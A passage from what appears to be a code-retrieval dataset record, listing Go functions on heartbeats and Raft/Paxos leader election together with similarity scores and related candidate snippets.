lid))\r\n\tif lid != -1{\r\n\t\trafts[lid-1].Shutdown()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"Leader(id:%v) is down, now\\n\", lid))\r\n\t\ttime.Sleep(4*time.Second)\t\t\t\r\n\t\trunning[lid] = false\r\n\t\tfor i := 1; i<= 5;i++{\r\n\t\t\tif running[i] {\r\n\t\t\t\trafts[i-1].Append([]byte(\"first\"))\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\ttime.Sleep(5*time.Second)\t\t\t\r\n\r\n\tfor idx, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tif running[idx-1]{\r\n\t\t\tnode.Shutdown()\r\n\t\t}\r\n\t}\r\n}", "func SendHeartBeat(c *nats.EncodedConn, me *NRS) {\n\ttkr := time.Tick(time.Second)\n\tgo func() {\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-tkr:\n\t\t\t\tc.Publish(string(HeartBeat), me)\n\t\t\t}\n\t\t}\n\t}()\n}", "func (r *Raft) becomeLeader() {\n\t// NOTE: Leader should propose a noop entry on its term\n\tr.State = StateLeader\n\tr.Vote = 0\n\tfor p, _ := range r.Prs {\n\t\tif p == r.id {\n\t\t\tcontinue\n\t\t}\n\t\tr.Prs[p].Match = 0\n\t\tr.Prs[p].Next = r.RaftLog.LastIndex() + 1\n\t}\n\t//r.initializeProgress()\n\n\t// send heartbeat\n\t//m := pb.Message{MsgType: pb.MessageType_MsgBeat, From: r.id, To: r.id}\n\t//r.sendMsgLocally(m)\n\t// send noop message\n\tr.sendInitialAppend()\n\tr.electionElapsed = 0\n}", "func (s *Service) Heartbeat(id int64, apiheartbeatrequestbodymessage *ApiHeartbeatRequestBodyMessage) *HeartbeatCall {\n\tc := &HeartbeatCall{s: s, urlParams_: make(gensupport.URLParams)}\n\tc.id = id\n\tc.apiheartbeatrequestbodymessage = apiheartbeatrequestbodymessage\n\treturn c\n}", "func (s *Slave) heartbeat() {\n\tif s.Version() < version1_7_0 {\n\t\treturn\n\t}\n\n\tvar (\n\t\terr error\n\t\tpp *BinaryPacket\n\t\tnumSeqErrors int\n\t)\n\tconst maxSeqErrors = 5\n\n\tticker := time.NewTicker(time.Second)\n\tdefer ticker.Stop()\n\nloop:\n\tfor {\n\t\tselect {\n\t\tcase <-s.c.exit:\n\t\t\treturn\n\t\tcase <-ticker.C:\n\t\t\tif pp, err = s.newPacket(&VClock{\n\t\t\t\tVClock: s.VClock.Clone(),\n\t\t\t}); err != nil {\n\t\t\t\tbreak loop\n\t\t\t}\n\n\t\t\terr = s.send(pp)\n\t\t\tpp.Release()\n\n\t\t\tif err == nil {\n\t\t\t\tnumSeqErrors = 0\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tnumSeqErrors++\n\t\t\tif numSeqErrors == maxSeqErrors {\n\t\t\t\tbreak loop\n\t\t\t}\n\t\t}\n\t}\n\n\ts.disconnect()\n}", "func SendHeartbeat(addr string) {\n\tconn, err := net.Dial(\"udp\", addr+\":8888\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tdefer conn.Close()\n\tmyRecord, _ := table.Load(myid)\n\tcount := myRecord.(membership).Counter\n\tcount++\n\ttable.Store(myid, membership{\n\t\tCounter: count,\n\t\tTime: time.Now().Unix(),\n\t\tStatus: true,\n\t})\n\trand.Seed(time.Now().Unix())\n\trandomnumber := rand.Intn(100)\n\tif(randomnumber>=0){\n\t\tconn.Write([]byte(SyncMapToByte(table)))\n\t}\n}", "func main() {\n goapp.SetAppStarter(new(ChatSrvStart))\n goapp.SetLoopHandler(new(ChatSrvLoop))\n\n goapp.SetHeartbeat(1000) // 1000ms / 1sec\n\n stopChan := goapp.Start(APP_NAME)\n <-stopChan\n}", "func (conn *LocalConnection) ensureHeartbeat(fast bool) error {\n\tif err := conn.ensureForwarders(); err != nil {\n\t\treturn err\n\t}\n\tvar heartbeat, fetchAll, fragTest <-chan time.Time\n\t// explicitly 0 length chan - make send block until receive occurs\n\tstop := make(chan interface{}, 0)\n\tif fast {\n\t\t// fast, nofetchall, no fragtest\n\t\t// Lang Spec: \"A nil channel is never ready for communication.\"\n\t\theartbeat = time.Tick(FastHeartbeat)\n\t} else {\n\t\theartbeat = time.Tick(SlowHeartbeat)\n\t\tfetchAll = time.Tick(FetchAllInterval)\n\t\tfragTest = time.Tick(FragTestInterval)\n\t}\n\t// Don't need locks here as this is only read here and in\n\t// handleShutdown, both of which are called by the connection\n\t// actor process only.\n\tif conn.heartbeatStop != nil {\n\t\tconn.heartbeatStop <- nil\n\t}\n\tconn.heartbeatStop = stop\n\tgo conn.forwardHeartbeats(heartbeat, fetchAll, fragTest, stop)\n\treturn nil\n}", "func (r *Raft) handleHeartbeat(m pb.Message) {\n\tr.Vote = 0\n}", "func TestRaft1(t *testing.T) {\n\n\t//Remove any state recovery files\n\tfor i := 0; i < 5; i++ {\n\t\tos.Remove(fmt.Sprintf(\"%s_S%d.state\", raft.FILENAME, i))\n\t}\n\n\tgo main() //Starts all servers\n\n\tvar leaderId1, leaderId2 int\n\tack := make(chan bool)\n\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId1 = raft.KillLeader() //Kill leader\n\t\tlog.Print(\"Killed leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(2*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId2 = raft.KillLeader() //Kill current leader again\n\t\tlog.Print(\"Killed leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServer(leaderId2) //Resurrect last killed as follower\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(4*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServerAsLeader(leaderId1) //Ressurect first one as leader\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(5*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tack <- true\n\t})\n\n\t<-ack\n}", "func (bili *BiliClient) heartbeatLoop() {\n\tfor bili.checkConnect() {\n\t\terr := bili.sendSocketData(0, 16, bili.protocolVersion, 2, 1, \"\")\n\t\tif err != nil {\n\t\t\tbili.setConnect(false)\n\t\t\tlog.Printf(\"heartbeatError:%s\\r\\n\", err.Error())\n\t\t\treturn\n\t\t}\n\t\ttime.Sleep(time.Second * 5)\n\t}\n}", "func MeasureHeartbeats(ctx context.Context, c []client.Client) *HealthMetrics {\n\tm := &HealthMetrics{\n\t\tnext: 0,\n\t\tclients: c,\n\t}\n\tif len(c) > 0 {\n\t\tgo m.startObserve(ctx)\n\t}\n\treturn m\n}", "func TestMasterDetectorFlappyConnectionState(t *testing.T) {\n\tconst ITERATIONS = 3\n\tvar (\n\t\tpath = test_zk_path\n\n\t\tbf = func(client ZKInterface, _ <-chan struct{}) (ZKInterface, error) {\n\t\t\tif client == nil {\n\t\t\t\tlog.V(1).Infoln(\"bootstrapping detector\")\n\t\t\t\tdefer log.V(1).Infoln(\"bootstrapping detector ..finished\")\n\n\t\t\t\tchildren := []string{\"info_0\", \"info_5\", \"info_10\"}\n\t\t\t\tmocked, snaps, errs := mock_zkdetector.NewClient(test_zk_path, children...)\n\t\t\t\tclient = mocked\n\n\t\t\t\tmocked.On(\"Data\", fmt.Sprintf(\"%s/info_0\", path)).Return(newTestMasterInfo(0), nil)\n\n\t\t\t\t// the first snapshot will be sent immediately and the detector will be awaiting en event.\n\t\t\t\t// cycle through some connected/disconnected events but maintain the same snapshot\n\t\t\t\tgo func() {\n\t\t\t\t\tdefer close(errs)\n\t\t\t\t\tfor attempt := 0; attempt < ITERATIONS; attempt++ {\n\t\t\t\t\t\t// send an error, should cause the detector to re-issue a watch\n\t\t\t\t\t\terrs <- zk.ErrSessionExpired\n\t\t\t\t\t\t// the detection loop issues another watch, so send it a snapshot..\n\t\t\t\t\t\t// send another snapshot\n\t\t\t\t\t\tsnaps <- children\n\t\t\t\t\t}\n\t\t\t\t}()\n\t\t\t}\n\t\t\treturn client, nil\n\t\t}\n\t\tcalled = 0\n\t\tlostMaster = make(chan struct{})\n\t\twg sync.WaitGroup\n\t\tmd, err = NewMasterDetector(zkurl, MinCyclePeriod(10*time.Millisecond), Bootstrap(bf))\n\t)\n\tdefer md.Cancel()\n\tassert.NoError(t, err)\n\n\twg.Add(1 + ITERATIONS) // +1 for the initial snapshot that's sent for the first watch\n\n\tconst EXPECTED_CALLS = (ITERATIONS * 2) + 2 // +1 for initial snapshot, +1 for final lost-leader (close(errs))\n\terr = md.Detect(detector.OnMasterChanged(func(master *mesos.MasterInfo) {\n\t\tcalled++\n\t\tlog.V(3).Infof(\"detector invoked: called %d\", called)\n\t\tswitch {\n\t\tcase called < EXPECTED_CALLS:\n\t\t\tif master != nil {\n\t\t\t\twg.Done()\n\t\t\t\tassert.Equal(t, master.GetId(), \"master(0)@localhost:5050\")\n\t\t\t}\n\t\tcase called == EXPECTED_CALLS:\n\t\t\tmd.Cancel()\n\t\t\tdefer close(lostMaster)\n\t\t\tassert.Nil(t, master)\n\t\tdefault:\n\t\t\tt.Errorf(\"unexpected notification call attempt %d\", called)\n\t\t}\n\t}))\n\tassert.NoError(t, err)\n\n\tfatalAfter(t, 10*time.Second, wg.Wait, \"Waited too long for new-master alerts\")\n\tfatalOn(t, 3*time.Second, lostMaster, \"Waited too long for lost master\")\n\n\tselect {\n\tcase <-md.Done():\n\t\tassert.Equal(t, EXPECTED_CALLS, called, \"expected %d detection callbacks instead of %d\", EXPECTED_CALLS, called)\n\tcase <-time.After(time.Second * 10):\n\t\tpanic(\"Waited too long for detector shutdown...\")\n\t}\n}", "func (bt *Heartbeat) Run(b *beat.Beat) error {\n\tlogp.Info(\"heartbeat is running! Hit CTRL-C to stop it.\")\n\n\terr := bt.RunStaticMonitors(b)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif b.ConfigManager.Enabled() {\n\t\tbt.RunCentralMgmtMonitors(b)\n\t}\n\n\tif bt.config.ConfigMonitors.Enabled() {\n\t\tbt.monitorReloader = cfgfile.NewReloader(b.Publisher, bt.config.ConfigMonitors)\n\t\tdefer bt.monitorReloader.Stop()\n\n\t\terr := bt.RunReloadableMonitors(b)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tif bt.config.Autodiscover != nil {\n\t\tbt.autodiscover, err = bt.makeAutodiscover(b)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tbt.autodiscover.Start()\n\t\tdefer bt.autodiscover.Stop()\n\t}\n\n\tif err := bt.scheduler.Start(); err != nil {\n\t\treturn err\n\t}\n\tdefer bt.scheduler.Stop()\n\n\t<-bt.done\n\n\tlogp.Info(\"Shutting down.\")\n\treturn nil\n}", "func TestLeaderElectionInOneRoundRPC(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tvotes map[uint64]bool\n\t\tstate StateType\n\t}{\n\t\t// win the election when receiving votes from a majority of the servers\n\t\t{1, map[uint64]bool{}, StateLeader},\n\t\t{3, map[uint64]bool{2: true, 3: true}, StateLeader},\n\t\t{3, map[uint64]bool{2: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true}, StateLeader},\n\n\t\t// return to follower state if it receives vote denial from a majority\n\t\t{3, map[uint64]bool{2: false, 3: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: false, 3: false, 4: false, 5: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: true, 3: false, 4: false, 5: false}, StateFollower},\n\n\t\t// stay in candidate if it does not obtain the majority\n\t\t{3, map[uint64]bool{}, StateCandidate},\n\t\t{5, map[uint64]bool{2: true}, StateCandidate},\n\t\t{5, map[uint64]bool{2: false, 3: false}, StateCandidate},\n\t\t{5, map[uint64]bool{}, StateCandidate},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tfor id, vote := range tt.votes {\n\t\t\tr.Step(pb.Message{From: id, To: 1, Term: r.Term, Type: pb.MsgVoteResp, Reject: !vote})\n\t\t}\n\n\t\tif r.state != tt.state {\n\t\t\tt.Errorf(\"#%d: state = %s, want %s\", i, r.state, tt.state)\n\t\t}\n\t\tif g := r.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", i, g, 1)\n\t\t}\n\t}\n}", "func SendHeartBeat(c net.Conn) {\n\twsData := &model.WsData{\n\t\tM: model.HEART_BEAT,\n\t\tC: model.WS_CODE_HEART_BEAT,\n\t\tD: \"Heart beat back\",\n\t}\n\tSendMsgToConn(c, wsData)\n}", "func TestRaft2(t *testing.T) {\n\tack := make(chan bool)\n\n\tleader := raft.GetLeaderId()\n\n\t//Kill some one who is not a leader\n\ts1 := (leader + 1) % 5\n\traft.KillServer(s1)\n\tt.Log(\"Killed \", s1)\n\n\t//Once more\n\ts2 := (s1 + 1) % 5\n\traft.KillServer(s2)\n\tt.Log(\"Killed \", s2)\n\n\t//Kill leader now\n\tleader = raft.KillLeader()\n\n\t//Make sure new leader doesn't get elected\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tif leaderId != -1 {\n\t\t\tt.Error(\"Leader should not get elected!\")\n\t\t}\n\t\tack <- true\n\t})\n\t<-ack\n\n\t//Resurrect for next test cases\n\traft.ResurrectServer(leader)\n\traft.ResurrectServer(s1)\n\traft.ResurrectServer(s2)\n\n\t//Wait for 1 second for new leader to get elected\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack\n}", "func TestLeaderElectionInitialMessages(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 3})\n\n\tvc := &pb.ViewChange{\n\t\tNodeId: 1,\n\t\tAttemptedView: 1,\n\t}\n\tmvc := &pb.Message_ViewChange{ViewChange: vc}\n\texp := []pb.Message{\n\t\t{To: 0, Type: mvc},\n\t\t{To: 2, Type: mvc},\n\t}\n\tif msgs := p.msgs; !reflect.DeepEqual(msgs, exp) {\n\t\tt.Errorf(\"expected the outbound messages %+v, found %+v\", exp, msgs)\n\t}\n}", "func TestDeadline(t *testing.T) {\n\tmsgChan, _, wg := initTest()\n\teb := eventbus.New()\n\tsupervisor, err := monitor.Launch(eb, unixSoc)\n\tassert.NoError(t, err)\n\n\tlog.AddHook(supervisor)\n\n\t// Send an error entry, to trigger Send\n\tlog.Errorln(\"pippo\")\n\n\tmsg := <-msgChan\n\tassert.Equal(t, \"error\", msg[\"level\"])\n\tassert.Equal(t, \"pippo\", msg[\"msg\"])\n\n\t// The write deadline is 3 seconds, so let's wait for that to expire\n\ttime.Sleep(3 * time.Second)\n\n\tblk := helper.RandomBlock(t, 23, 4)\n\tmsgBlk := message.New(topics.AcceptedBlock, *blk)\n\teb.Publish(topics.AcceptedBlock, msgBlk)\n\n\t// Should get the accepted block message on the msgchan\n\tfor {\n\t\tmsg = <-msgChan\n\t\t// We should discard any other messages\n\t\tif msg[\"code\"] == \"round\" {\n\t\t\t// Success\n\t\t\tbreak\n\t\t}\n\t}\n\n\t_ = supervisor.Stop()\n\twg.Wait()\n}", "func (_SimpleSavingsWallet *SimpleSavingsWalletTransactor) Heartbeat(opts *bind.TransactOpts) (*types.Transaction, error) {\n\treturn _SimpleSavingsWallet.contract.Transact(opts, \"heartbeat\")\n}" ]
[ "0.71547526", "0.70240164", "0.63609374", "0.62657857", "0.62503654", "0.62429494", "0.61554277", "0.60415953", "0.6011709", "0.59536695", "0.58787113", "0.5639564", "0.56021845", "0.55552447", "0.54215586", "0.5409809", "0.5384751", "0.5377757", "0.53510165", "0.532129", "0.53178674", "0.53137594", "0.52712137", "0.5230943", "0.5225087", "0.5202674", "0.51916957", "0.5156346", "0.51429033", "0.5135088", "0.51103383", "0.508242", "0.50689405", "0.5052413", "0.504397", "0.50147754", "0.5005078", "0.5002157", "0.4999435", "0.49874997", "0.4982407", "0.49776316", "0.49607107", "0.49591142", "0.49573424", "0.49451697", "0.49367547", "0.49298", "0.49210286", "0.49009168", "0.48974124", "0.488546", "0.48821828", "0.48779425", "0.48704055", "0.48579592", "0.4857757", "0.48564702", "0.4856289", "0.48555642", "0.48443854", "0.48407257", "0.4837821", "0.4837284", "0.48296818", "0.48253027", "0.48243654", "0.48162508", "0.48139706", "0.48109353", "0.47994876", "0.47984162", "0.47679117", "0.4758449", "0.4751712", "0.47474447", "0.47427633", "0.47411776", "0.47409466", "0.47359008", "0.47291294", "0.47138035", "0.47099903", "0.4694614", "0.4672163", "0.46693036", "0.46587923", "0.4646278", "0.4645622", "0.46396858", "0.46376765", "0.4637492", "0.4629704", "0.46296075", "0.46294883", "0.46272317", "0.46269706", "0.46259758", "0.46162522", "0.46109763" ]
0.8377475
0
testNonleaderStartElection tests that if a follower receives no communication over election timeout, it begins an election to choose a new leader. It increments its current term and transitions to candidate state. It then votes for itself and issues RequestVote RPCs in parallel to each of the other servers in the cluster. Reference: section 5.2 Also if a candidate fails to obtain a majority, it will time out and start a new election by incrementing its term and initiating another round of RequestVote RPCs. Reference: section 5.2
func testNonleaderStartElection(t *testing.T, state StateType) { // election timeout et := 10 r := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage()) defer closeAndFreeRaft(r) switch state { case StateFollower: r.becomeFollower(1, 2) case StateCandidate: r.becomeCandidate() } for i := 1; i < 2*et; i++ { r.tick() } if r.Term != 2 { t.Errorf("term = %d, want 2", r.Term) } if r.state != StateCandidate { t.Errorf("state = %s, want %s", r.state, StateCandidate) } if !r.votes[r.id] { t.Errorf("vote for self = false, want true") } msgs := r.readMessages() sort.Sort(messageSlice(msgs)) wmsgs := []pb.Message{ {From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, To: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 2, Type: pb.MsgVote}, {From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, To: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 2, Type: pb.MsgVote}, } if !reflect.DeepEqual(msgs, wmsgs) { t.Errorf("msgs = %v, want %v", msgs, wmsgs) } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestLeaderElectionInOneRoundRPC(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tvotes map[uint64]bool\n\t\tstate StateType\n\t}{\n\t\t// win the election when receiving votes from a majority of the servers\n\t\t{1, map[uint64]bool{}, StateLeader},\n\t\t{3, map[uint64]bool{2: true, 3: true}, StateLeader},\n\t\t{3, map[uint64]bool{2: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true}, StateLeader},\n\n\t\t// return to follower state if it receives vote denial from a majority\n\t\t{3, map[uint64]bool{2: false, 3: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: false, 3: false, 4: false, 5: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: true, 3: false, 4: false, 5: false}, StateFollower},\n\n\t\t// stay in candidate if it does not obtain the majority\n\t\t{3, map[uint64]bool{}, StateCandidate},\n\t\t{5, map[uint64]bool{2: true}, StateCandidate},\n\t\t{5, map[uint64]bool{2: false, 3: false}, StateCandidate},\n\t\t{5, map[uint64]bool{}, StateCandidate},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tfor id, vote := range tt.votes {\n\t\t\tr.Step(pb.Message{From: id, To: 1, Term: r.Term, Type: pb.MsgVoteResp, Reject: !vote})\n\t\t}\n\n\t\tif r.state != tt.state {\n\t\t\tt.Errorf(\"#%d: state = %s, want %s\", i, r.state, tt.state)\n\t\t}\n\t\tif g := r.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", i, g, 1)\n\t\t}\n\t}\n}", "func TestNodeWithSmallerTermCanCompleteElection(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\t// cause a network partition to isolate node 3\n\tnt := newNetwork(n1, n2, n3)\n\tnt.cut(1, 3)\n\tnt.cut(2, 3)\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// a.Term == 3\n\t// b.Term == 3\n\t// c.Term == 1\n\tsm = nt.peers[1].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 1 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 1 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 1)\n\t}\n\n\t// check state\n\t// a == follower\n\t// b == leader\n\t// c == pre-candidate\n\tsm = nt.peers[1].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tsm.logger.Infof(\"going to bring back peer 3 and kill peer 2\")\n\t// recover the network then immediately isolate b which is currently\n\t// the leader, this is to emulate the crash of b.\n\tnt.recover()\n\tnt.cut(2, 1)\n\tnt.cut(2, 3)\n\n\t// call for election\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// do we have a leader?\n\tsma := nt.peers[1].(*raft)\n\tsmb := nt.peers[3].(*raft)\n\tif sma.state != StateLeader && smb.state != StateLeader {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func (node *Node) runElection() {\n\tnode.currentTerm++\n\tcurrentTerm := node.currentTerm\n\tnode.state = candidate\n\tnode.votedFor = node.id\n\tnode.timeSinceTillLastReset = time.Now()\n\n\tlog.Printf(\"Node %d has become a candidate with currentTerm=%d\", node.id, node.currentTerm)\n\n\t// We vote for ourselves.\n\tvar votesReceived int32 = 1\n\n\t// Send votes to all the other machines in the raft group.\n\tfor _, nodeID := range node.participantNodes {\n\t\tgo func(id int) {\n\t\t\tvoteRequestArgs := RequestVoteArgs{\n\t\t\t\tterm: currentTerm,\n\t\t\t\tcandidateID: id,\n\t\t\t}\n\n\t\t\tvar reply RequestVoteReply\n\t\t\tlog.Printf(\"Sending a RequestVote to %d with args %+v\", id, voteRequestArgs)\n\n\t\t\tif err := node.server.Call(id, \"Node.RequestVote\", voteRequestArgs, &reply); err == nil {\n\t\t\t\tlog.Printf(\"Received a response for RequestVote from node %d saying %+v, for the election started by node %d\", id, reply, node.id)\n\n\t\t\t\tnode.mu.Lock()\n\t\t\t\tdefer node.mu.Unlock()\n\n\t\t\t\t// If the state of the current node has changed by the time the election response arrives then we must back off.\n\t\t\t\tif node.state != candidate {\n\t\t\t\t\tlog.Printf(\"The state of node %d has changed from candidate to %s while waiting for an election response\", node.id, node.state)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// If the node responds with a higher term then we must back off from the election.\n\t\t\t\tif reply.term > currentTerm {\n\t\t\t\t\tnode.updateStateToFollower(reply.term)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tif reply.term == currentTerm {\n\t\t\t\t\tif reply.voteGranted {\n\t\t\t\t\t\tvotes := int(atomic.AddInt32(&votesReceived, 1))\n\t\t\t\t\t\t// Check for majority votes having been received.\n\t\t\t\t\t\tif votes > (len(node.participantNodes)+1)/2 {\n\t\t\t\t\t\t\tlog.Printf(\"The election has been won by node %d\", node.id)\n\t\t\t\t\t\t\tnode.updateStateToLeader()\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}(nodeID)\n\t}\n}", "func TestPreVoteWithSplitVote(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// simulate leader down. followers start split vote.\n\tnt.isolate(1)\n\tnt.send([]pb.Message{\n\t\t{From: 2, To: 2, Type: pb.MsgHup},\n\t\t{From: 3, To: 3, Type: pb.MsgHup},\n\t}...)\n\n\t// check whether the term values are expected\n\t// n2.Term == 3\n\t// n3.Term == 3\n\tsm := nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\t// check state\n\t// n2 == candidate\n\t// n3 == candidate\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\n\t// node 2 election timeout first\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// n2.Term == 4\n\t// n3.Term == 4\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 4)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 4)\n\t}\n\n\t// check state\n\t// n2 == leader\n\t// n3 == follower\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n}", "func (s *raftServer) startElection() {\n\ts.setState(CANDIDATE)\n\tpeers := s.server.Peers()\n\ts.writeToLog(\"Number of peers: \" + strconv.Itoa(len(peers)))\n\tvotes := make(map[int]bool) // map to store received votes\n\tvotes[s.server.Pid()] = true\n\ts.voteFor(s.server.Pid(), s.Term())\n\tfor s.State() == CANDIDATE {\n\t\ts.incrTerm() // increment term for current\n\t\tcandidateTimeout := time.Duration(s.duration + s.rng.Int63n(RandomTimeoutRange)) // random timeout used by Raft authors\n\t\ts.sendRequestVote()\n\t\ts.writeToLog(\"Sent RequestVote message \" + strconv.Itoa(int(candidateTimeout)))\n\t\ts.eTimeout.Reset(candidateTimeout * time.Millisecond) // start re-election timer\n\t\tfor {\n\t\t\tacc := false\n\t\t\tselect 